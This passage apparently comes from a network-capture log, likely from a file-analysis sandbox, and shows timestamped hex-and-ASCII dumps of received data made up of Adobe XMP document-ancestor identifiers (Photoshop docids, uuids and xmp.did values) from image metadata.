                                                                                                                                                                                    2023-01-05 07:58:10 UTC4611INData Raw: 43 38 46 42 43 39 30 43 33 35 44 39 30 44 36 34 37 30 42 42 41 37 34 34 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 45 41 36 46 34 44 45 32 38 45 35 35 30 30 35 34 44 45 33 42 32 41 44 32 45 35 31 33 37 42 35 38 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 45 41 37 32 39 46 41 39 42 30 44 31 37 38 34 33 37 44 37 36 45 34 44 46 41 33 35 32 35 34 44 41 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 45 41 39 30 31 30 46 43 31 36 41 37 37 32 42 44 31 43 44 37 31 33 46 42 44 39 34 42 30 38 32 31 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 45 41 39 31 37 38 43 42 34 30 36 38 35 44 31 33 42 43 45 36 32 30 42 32 38 37 36 46 31 33 30 46 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 45 41 39 37 34 41 35 42 41 45 31 38 43
                                                                                                                                                                                    Data Ascii: C8FBC90C35D90D6470BBA744</rdf:li> <rdf:li>EA6F4DE28E550054DE3B2AD2E5137B58</rdf:li> <rdf:li>EA729FA9B0D178437D76E4DFA35254DA</rdf:li> <rdf:li>EA9010FC16A772BD1CD713FBD94B0821</rdf:li> <rdf:li>EA9178CB40685D13BCE620B2876F130F</rdf:li> <rdf:li>EA974A5BAE18C
                                                                                                                                                                                    2023-01-05 07:58:10 UTC4627INData Raw: 3c 72 64 66 3a 6c 69 3e 46 34 45 42 30 46 44 41 35 36 30 46 45 42 41 35 42 44 39 46 46 45 36 39 44 38 44 31 30 34 32 44 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 46 34 46 30 33 42 34 32 34 39 39 44 45 38 38 41 37 34 44 31 37 31 41 34 43 41 35 44 42 31 45 39 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 46 34 46 31 42 35 44 44 37 39 41 35 46 36 33 39 41 32 30 39 38 38 36 39 46 35 35 32 31 33 38 46 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 46 34 46 41 30 38 36 35 44 37 41 34 43 31 39 36 34 37 33 46 43 46 45 38 45 41 38 44 46 35 41 43 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 46 35 30 39 46 46 37 33 42 30 38 39 46 30 39 41 45 35 33 42 38 43 45 46 43 39 46 43 45 30 33 35 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a
                                                                                                                                                                                    Data Ascii: <rdf:li>F4EB0FDA560FEBA5BD9FFE69D8D1042D</rdf:li> <rdf:li>F4F03B42499DE88A74D171A4CA5DB1E9</rdf:li> <rdf:li>F4F1B5DD79A5F639A2098869F552138F</rdf:li> <rdf:li>F4FA0865D7A4C196473FCFE8EA8DF5AC</rdf:li> <rdf:li>F509FF73B089F09AE53B8CEFC9FCE035</rdf:li> <rdf:
                                                                                                                                                                                    2023-01-05 07:58:10 UTC4635INData Raw: 64 66 3a 6c 69 3e 46 41 36 42 36 31 43 45 33 37 36 34 38 31 44 44 31 42 43 41 35 35 42 42 38 46 34 37 45 45 32 43 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 46 41 36 46 31 41 38 31 42 39 36 39 31 42 32 35 46 33 43 38 45 36 39 44 31 39 38 34 38 42 43 31 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 46 41 38 32 32 44 45 32 46 44 42 39 46 34 33 45 42 35 39 32 39 38 44 33 34 34 37 46 38 44 38 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 46 41 38 42 35 36 45 35 35 44 44 37 32 36 42 41 37 41 31 37 31 42 39 39 38 38 44 33 36 34 43 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 46 41 39 41 38 42 38 34 41 43 31 45 38 45 43 31 43 42 37 32 31 36 36 32 37 39 42 34 31 43 41 46 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69
                                                                                                                                                                                    Data Ascii: df:li>FA6B61CE376481DD1BCA55BB8F47EE2C</rdf:li> <rdf:li>FA6F1A81B9691B25F3C8E69D19848BC1</rdf:li> <rdf:li>FA822DE2FDB9F43EB59298D3447F8D86</rdf:li> <rdf:li>FA8B56E55DD726BA7A171B9988D364C6</rdf:li> <rdf:li>FA9A8B84AC1E8EC1CB72166279B41CAF</rdf:li> <rdf:li
                                                                                                                                                                                    2023-01-05 07:58:10 UTC4667INData Raw: 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 31 62 65 30 37 66 65 39 2d 34 34 66 65 2d 31 31 64 64 2d 38 61 33 63 2d 64 37 36 63 30 65 33 66 33 31 32 66 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 31 63 64 31 38 35 63 31 2d 38 65 31 61 2d 31 31 65 37 2d 62 66 35 32 2d 63 65 30 36 61 64 31 34 65 35 38 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 31 65 36 38 33 34 32 33 2d 31 34 35 33 2d 31 31 65 35 2d 38 31 37 61 2d 66 31 64 65 31 61 30 38 31 30 36 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 31 65 62 30 36 30 30 65 2d 63
                                                                                                                                                                                    Data Ascii: :docid:photoshop:1be07fe9-44fe-11dd-8a3c-d76c0e3f312f</rdf:li> <rdf:li>adobe:docid:photoshop:1cd185c1-8e1a-11e7-bf52-ce06ad14e586</rdf:li> <rdf:li>adobe:docid:photoshop:1e683423-1453-11e5-817a-f1de1a081066</rdf:li> <rdf:li>adobe:docid:photoshop:1eb0600e-c
                                                                                                                                                                                    2023-01-05 07:58:10 UTC4691INData Raw: 62 37 36 39 63 62 37 66 66 62 65 30 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 34 61 35 65 36 39 39 32 2d 36 33 37 62 2d 31 31 37 62 2d 39 36 31 64 2d 38 66 62 35 34 31 66 35 32 61 31 61 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 34 61 38 37 61 39 39 64 2d 65 36 30 62 2d 31 31 65 37 2d 38 32 32 66 2d 65 38 37 38 66 31 64 37 66 39 64 30 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 34 61 39 61 64 35 38 37 2d 61 32 30 37 2d 31 31 64 39 2d 62 65 62 66 2d 38 63 35 32 63 66 32 36 62 32 34 62 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a
                                                                                                                                                                                    Data Ascii: b769cb7ffbe0</rdf:li> <rdf:li>adobe:docid:photoshop:4a5e6992-637b-117b-961d-8fb541f52a1a</rdf:li> <rdf:li>adobe:docid:photoshop:4a87a99d-e60b-11e7-822f-e878f1d7f9d0</rdf:li> <rdf:li>adobe:docid:photoshop:4a9ad587-a207-11d9-bebf-8c52cf26b24b</rdf:li> <rdf:
                                                                                                                                                                                    2023-01-05 07:58:10 UTC4699INData Raw: 68 6f 70 3a 36 30 64 65 39 32 63 30 2d 34 62 61 36 2d 31 31 65 37 2d 62 39 30 38 2d 66 64 65 35 64 37 63 66 33 30 31 39 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 36 31 32 65 64 36 62 38 2d 32 36 66 35 2d 31 31 37 38 2d 61 37 33 36 2d 39 66 35 31 37 33 63 37 32 36 32 64 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 36 31 33 61 39 36 38 35 2d 34 39 61 64 2d 31 31 64 38 2d 62 63 32 31 2d 65 35 62 37 35 31 63 65 63 62 32 30 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 36 31 62 34 61 65 30 33 2d 36 62 66 39 2d 31 31 64 39 2d 38 63 64 36
                                                                                                                                                                                    Data Ascii: hop:60de92c0-4ba6-11e7-b908-fde5d7cf3019</rdf:li> <rdf:li>adobe:docid:photoshop:612ed6b8-26f5-1178-a736-9f5173c7262d</rdf:li> <rdf:li>adobe:docid:photoshop:613a9685-49ad-11d8-bc21-e5b751cecb20</rdf:li> <rdf:li>adobe:docid:photoshop:61b4ae03-6bf9-11d9-8cd6
                                                                                                                                                                                    2023-01-05 07:58:10 UTC4715INData Raw: 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 38 62 66 33 33 30 31 63 2d 36 62 30 32 2d 31 31 64 39 2d 61 32 32 64 2d 61 31 30 37 34 37 38 65 62 63 34 63 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 38 62 66 66 61 33 32 63 2d 35 33 34 36 2d 31 31 65 35 2d 39 39 61 33 2d 39 66 34 66 30 64 38 36 63 65 32 63 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 38 63 32 38 37 34 35 66 2d 64 62 30 37 2d 63 33 34 32 2d 61 37 38 39 2d 32 61 37 30 30 63 30 64 62 62 37 62 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70
                                                                                                                                                                                    Data Ascii: f:li> <rdf:li>adobe:docid:photoshop:8bf3301c-6b02-11d9-a22d-a107478ebc4c</rdf:li> <rdf:li>adobe:docid:photoshop:8bffa32c-5346-11e5-99a3-9f4f0d86ce2c</rdf:li> <rdf:li>adobe:docid:photoshop:8c28745f-db07-c342-a789-2a700c0dbb7b</rdf:li> <rdf:li>adobe:docid:p
                                                                                                                                                                                    2023-01-05 07:58:10 UTC4731INData Raw: 2d 36 62 34 30 2d 31 31 64 37 2d 38 62 30 36 2d 38 30 61 30 31 39 63 35 66 39 30 30 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 63 30 33 66 66 39 63 63 2d 61 33 61 32 2d 31 31 65 30 2d 39 64 65 66 2d 39 35 61 32 37 31 37 62 34 35 65 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 63 30 62 34 37 32 34 66 2d 36 63 36 34 2d 35 30 34 37 2d 38 39 30 35 2d 32 66 64 39 38 30 34 62 61 39 33 34 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 63 30 65 37 30 31 39 35 2d 61 34 35 36 2d 31 31 37 39 2d 61 33 38 30 2d 39 61 34 32 64 37 61 36 30 34 64
                                                                                                                                                                                    Data Ascii: -6b40-11d7-8b06-80a019c5f900</rdf:li> <rdf:li>adobe:docid:photoshop:c03ff9cc-a3a2-11e0-9def-95a2717b45e3</rdf:li> <rdf:li>adobe:docid:photoshop:c0b4724f-6c64-5047-8905-2fd9804ba934</rdf:li> <rdf:li>adobe:docid:photoshop:c0e70195-a456-1179-a380-9a42d7a604d
                                                                                                                                                                                    2023-01-05 07:58:10 UTC4738INData Raw: 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 64 39 66 37 35 64 32 32 2d 38 63 62 32 2d 31 31 37 38 2d 38 35 37 63 2d 64 36 61 39 66 34 61 38 66 32 39 66 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 64 61 31 36 37 35 33 32 2d 39 31 64 39 2d 31 31 65 36 2d 61 30 33 65 2d 65 32 62 33 61 32 66 62 36 37 65 31 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 64 61 32 34 38 37 38 31 2d 34 30 32 39 2d 31 31 65 30 2d 62 39 64 64 2d 65 36 39 38 31 35 37 35 30 32 33 64 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 64 61 32 39 62 65 65
                                                                                                                                                                                    Data Ascii: obe:docid:photoshop:d9f75d22-8cb2-1178-857c-d6a9f4a8f29f</rdf:li> <rdf:li>adobe:docid:photoshop:da167532-91d9-11e6-a03e-e2b3a2fb67e1</rdf:li> <rdf:li>adobe:docid:photoshop:da248781-4029-11e0-b9dd-e6981575023d</rdf:li> <rdf:li>adobe:docid:photoshop:da29bee
                                                                                                                                                                                    2023-01-05 07:58:10 UTC4770INData Raw: 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 30 37 36 45 33 34 34 31 31 32 41 36 44 46 31 31 41 44 31 38 38 30 31 39 34 39 42 45 43 42 35 44 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 30 37 38 35 44 39 36 46 37 38 34 39 44 46 31 31 38 30 43 32 43 46 44 46 45 35 35 42 41 42 30 39 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 30 37 39 35 34 44 45 36 36 36 41 45 45 30 31 31 41 38 39 33 39 39 35 35 42 44 45 31 39 45 43 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 30 37 42 32 42 46 33 44 43 32 34 34 45 30 31 31 42 36 45 31 43 33 34 31 43 36 33 41 44 37 34 35 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 30 38 31 35 35 45 43 31 35 33 43 45 31 31 44 46 41 46 30
                                                                                                                                                                                    Data Ascii: i> <rdf:li>uuid:076E344112A6DF11AD18801949BECB5D</rdf:li> <rdf:li>uuid:0785D96F7849DF1180C2CFDFE55BAB09</rdf:li> <rdf:li>uuid:07954DE666AEE011A8939955BDE19EC6</rdf:li> <rdf:li>uuid:07B2BF3DC244E011B6E1C341C63AD745</rdf:li> <rdf:li>uuid:08155EC153CE11DFAF0
                                                                                                                                                                                    2023-01-05 07:58:10 UTC4786INData Raw: 45 32 46 35 32 31 31 32 46 36 42 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 33 46 33 41 43 41 44 43 35 42 42 35 44 44 31 31 42 34 44 37 46 35 43 33 45 32 32 33 43 37 45 41 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 33 46 34 42 38 31 42 45 31 37 35 45 44 44 31 31 42 42 37 34 46 45 35 42 35 30 31 46 42 45 43 34 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 33 46 35 42 39 30 38 46 43 45 44 41 44 46 31 31 42 45 43 36 41 33 42 46 38 44 36 39 34 34 35 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 33 46 37 38 36 31 36 30 39 43 43 36 31 31 44 42 39 41 45 45 38 36 46 34 41 36 33 32 41 37 35 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 33
                                                                                                                                                                                    Data Ascii: E2F52112F6B</rdf:li> <rdf:li>uuid:3F3ACADC5BB5DD11B4D7F5C3E223C7EA</rdf:li> <rdf:li>uuid:3F4B81BE175EDD11BB74FE5B501FBEC4</rdf:li> <rdf:li>uuid:3F5B908FCEDADF11BEC6A3BF8D694452</rdf:li> <rdf:li>uuid:3F7861609CC611DB9AEE86F4A632A752</rdf:li> <rdf:li>uuid:3
                                                                                                                                                                                    2023-01-05 07:58:10 UTC4818INData Raw: 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 35 37 41 32 32 36 34 31 32 44 45 41 45 30 31 31 38 43 43 46 38 46 41 35 36 46 46 38 44 36 41 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 35 37 44 42 44 38 34 45 43 31 36 32 45 30 31 31 38 43 31 36 44 31 42 39 37 41 32 35 36 35 37 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 35 38 30 35 35 46 43 42 39 37 41 35 31 31 44 44 41 37 45 32 39 43 30 46 33 36 32 37 30 46 46 42 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 35 38 32 45 41 44 42 44 42 35 30 39 45 34 31 31 38 33 36 33 44 36 35 31 41 32 33 34 34 38 38 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 35 38 33 42 32 32 34 35 41 33 32 41 44 42 31 31 39 42 44 35 42
                                                                                                                                                                                    Data Ascii: <rdf:li>uuid:57A226412DEAE0118CCF8FA56FF8D6A6</rdf:li> <rdf:li>uuid:57DBD84EC162E0118C16D1B97A256573</rdf:li> <rdf:li>uuid:58055FCB97A511DDA7E29C0F36270FFB</rdf:li> <rdf:li>uuid:582EADBDB509E4118363D651A2344883</rdf:li> <rdf:li>uuid:583B2245A32ADB119BD5B
                                                                                                                                                                                    2023-01-05 07:58:10 UTC4850INData Raw: 45 41 45 42 37 46 39 31 33 38 44 42 42 42 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 38 41 38 42 41 43 35 38 39 33 44 33 44 46 31 31 42 42 34 36 41 45 45 39 46 42 45 41 34 33 39 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 38 41 38 44 36 38 46 34 36 43 30 46 31 31 44 43 39 36 36 39 41 30 41 34 43 39 39 33 46 30 46 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 38 41 43 46 36 30 32 43 45 34 39 30 44 44 31 31 41 43 37 38 38 34 33 39 34 33 31 43 31 35 34 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 38 41 44 44 30 39 38 43 41 41 39 45 44 43 31 31 41 30 34 33 39 38 30 35 30 30 37 36 46 43 38 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69
                                                                                                                                                                                    Data Ascii: EAEB7F9138DBBB</rdf:li> <rdf:li>uuid:8A8BAC5893D3DF11BB46AEE9FBEA4392</rdf:li> <rdf:li>uuid:8A8D68F46C0F11DC9669A0A4C993F0F6</rdf:li> <rdf:li>uuid:8ACF602CE490DD11AC788439431C1542</rdf:li> <rdf:li>uuid:8ADD098CAA9EDC11A04398050076FC83</rdf:li> <rdf:li>uui
                                                                                                                                                                                    2023-01-05 07:58:10 UTC5384INData Raw: 37 33 42 37 30 35 37 33 45 35 31 31 44 41 39 38 30 43 46 35 45 30 44 46 46 46 35 45 44 31 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 42 44 39 38 34 37 33 35 33 35 34 36 44 45 31 31 38 45 30 35 45 30 30 41 39 32 34 44 38 43 43 35 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 42 44 41 33 42 31 45 31 38 42 41 32 44 45 31 31 42 45 44 37 43 35 37 44 45 34 38 36 46 45 34 39 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 42 44 44 35 36 35 38 44 41 39 41 41 31 31 45 31 42 31 45 38 39 45 31 46 30 42 30 38 42 44 37 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 42 45 30 32 46 31 43 42 34 35 32 33 45 31 31 31 42 30 44 46 42 38 36 34 37 30 37 30 35 30 30 32 3c 2f 72 64 66
                                                                                                                                                                                    Data Ascii: 73B70573E511DA980CF5E0DFFF5ED1</rdf:li> <rdf:li>uuid:BD9847353546DE118E05E00A924D8CC5</rdf:li> <rdf:li>uuid:BDA3B1E18BA2DE11BED7C57DE486FE49</rdf:li> <rdf:li>uuid:BDD5658DA9AA11E1B1E89E1F0B08BD72</rdf:li> <rdf:li>uuid:BE02F1CB4523E111B0DFB86470705002</rdf
                                                                                                                                                                                    2023-01-05 07:58:10 UTC5391INData Raw: 45 36 37 31 31 45 32 41 38 38 31 44 42 35 34 45 39 45 45 41 30 43 42 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 44 44 37 44 31 39 37 42 32 37 31 35 44 43 31 31 41 46 43 43 44 41 45 30 34 32 43 45 31 34 36 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 44 44 45 35 35 43 46 33 39 46 43 32 44 43 31 31 42 34 34 31 38 44 38 38 41 43 44 41 31 46 39 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 44 44 46 31 39 37 34 46 32 45 33 38 44 46 31 31 41 46 39 32 42 45 43 45 32 39 37 34 44 31 39 38 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 44 45 31 38 36 44 45 41 38 37 36 36 45 30 31 31 42 41 45 45 38 32 33 30 33 31 31 36 46 44 32 44 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72
                                                                                                                                                                                    Data Ascii: E6711E2A881DB54E9EEA0CB</rdf:li> <rdf:li>uuid:DD7D197B2715DC11AFCCDAE042CE1463</rdf:li> <rdf:li>uuid:DDE55CF39FC2DC11B4418D88ACDA1F93</rdf:li> <rdf:li>uuid:DDF1974F2E38DF11AF92BECE2974D198</rdf:li> <rdf:li>uuid:DE186DEA8766E011BAEE82303116FD2D</rdf:li> <r
                                                                                                                                                                                    2023-01-05 07:58:10 UTC5526INData Raw: 38 31 35 31 36 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 30 31 38 30 31 31 37 34 30 37 32 30 36 38 31 31 39 31 30 39 46 33 30 35 36 34 36 45 42 35 37 44 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 30 31 38 30 31 31 37 34 30 37 32 30 36 38 31 31 39 31 30 39 46 39 34 41 31 32 33 41 43 34 46 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 30 31 38 30 31 31 37 34 30 37 32 30 36 38 31 31 39 31 30 39 46 41 32 39 37 41 37 41 35 39 30 34 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 30 31 38 30 31 31 37 34 30 37 32 30 36 38 31 31 39 31 38 39 45 34 39 46 39 44 45 33 30 39 30 42 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69
                                                                                                                                                                                    Data Ascii: 815163</rdf:li> <rdf:li>xmp.did:01801174072068119109F305646EB57D</rdf:li> <rdf:li>xmp.did:01801174072068119109F94A123AC4F6</rdf:li> <rdf:li>xmp.did:01801174072068119109FA297A7A5904</rdf:li> <rdf:li>xmp.did:01801174072068119189E49F9DE3090B</rdf:li> <rdf:li
                                                                                                                                                                                    2023-01-05 07:58:10 UTC5566INData Raw: 31 31 38 41 36 44 42 42 34 46 32 43 42 43 34 35 30 45 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 30 34 38 30 31 31 37 34 30 37 32 30 36 38 31 31 38 41 36 44 43 32 35 39 41 32 31 43 32 42 44 42 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 30 34 38 30 31 31 37 34 30 37 32 30 36 38 31 31 38 41 36 44 43 41 39 45 46 42 39 43 35 36 30 45 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 30 34 38 30 31 31 37 34 30 37 32 30 36 38 31 31 38 43 31 34 42 38 42 37 41 39 32 31 42 33 34 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 30 34 38 30 31 31 37 34 30 37 32 30 36 38 31 31 38 43 31 34 42 39 39 35 30 45 36 44 39 32 32 32 3c 2f 72 64 66
                                                                                                                                                                                    Data Ascii: 118A6DBB4F2CBC450E</rdf:li> <rdf:li>xmp.did:04801174072068118A6DC259A21C2BDB</rdf:li> <rdf:li>xmp.did:04801174072068118A6DCA9EFB9C560E</rdf:li> <rdf:li>xmp.did:04801174072068118C14B8B7A921B342</rdf:li> <rdf:li>xmp.did:04801174072068118C14B9950E6D9222</rdf
                                                                                                                                                                                    2023-01-05 07:58:10 UTC5590INData Raw: 42 46 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 30 36 38 30 31 31 37 34 30 37 32 30 36 38 31 31 39 31 30 39 43 43 35 34 41 46 37 37 43 34 41 34 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 30 36 38 30 31 31 37 34 30 37 32 30 36 38 31 31 39 32 42 30 38 43 36 39 31 33 33 31 39 35 43 38 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 30 36 38 30 31 31 37 34 30 37 32 30 36 38 31 31 39 32 42 30 45 30 42 30 41 33 41 38 45 34 37 42 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 30 36 38 30 31 31 37 34 30 37 32 30 36 38 31 31 39 32 42 30 46 41 43 45 46 43 44 32 33 36 45 46 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70
                                                                                                                                                                                    Data Ascii: BF</rdf:li> <rdf:li>xmp.did:06801174072068119109CC54AF77C4A4</rdf:li> <rdf:li>xmp.did:068011740720681192B08C69133195C8</rdf:li> <rdf:li>xmp.did:068011740720681192B0E0B0A3A8E47B</rdf:li> <rdf:li>xmp.did:068011740720681192B0FACEFCD236EF</rdf:li> <rdf:li>xmp
                                                                                                                                                                                    2023-01-05 07:58:10 UTC5606INData Raw: 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 30 63 37 37 66 36 31 62 2d 61 38 66 31 2d 63 34 34 62 2d 38 65 32 32 2d 33 32 66 38 36 37 39 31 62 65 63 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 30 63 38 39 66 66 62 66 2d 62 31 32 30 2d 65 35 34 34 2d 61 31 36 66 2d 32 39 66 63 33 32 62 63 34 64 63 34 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 30 63 62 39 34 34 31 37 2d 30 61 61 64 2d 34 39 31 65 2d 61 38 64 39 2d 37 34 37 62 63 64 61 33 37 38 32 61 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 30 63 63 66 30 32 64 36 2d 64 36 37 63 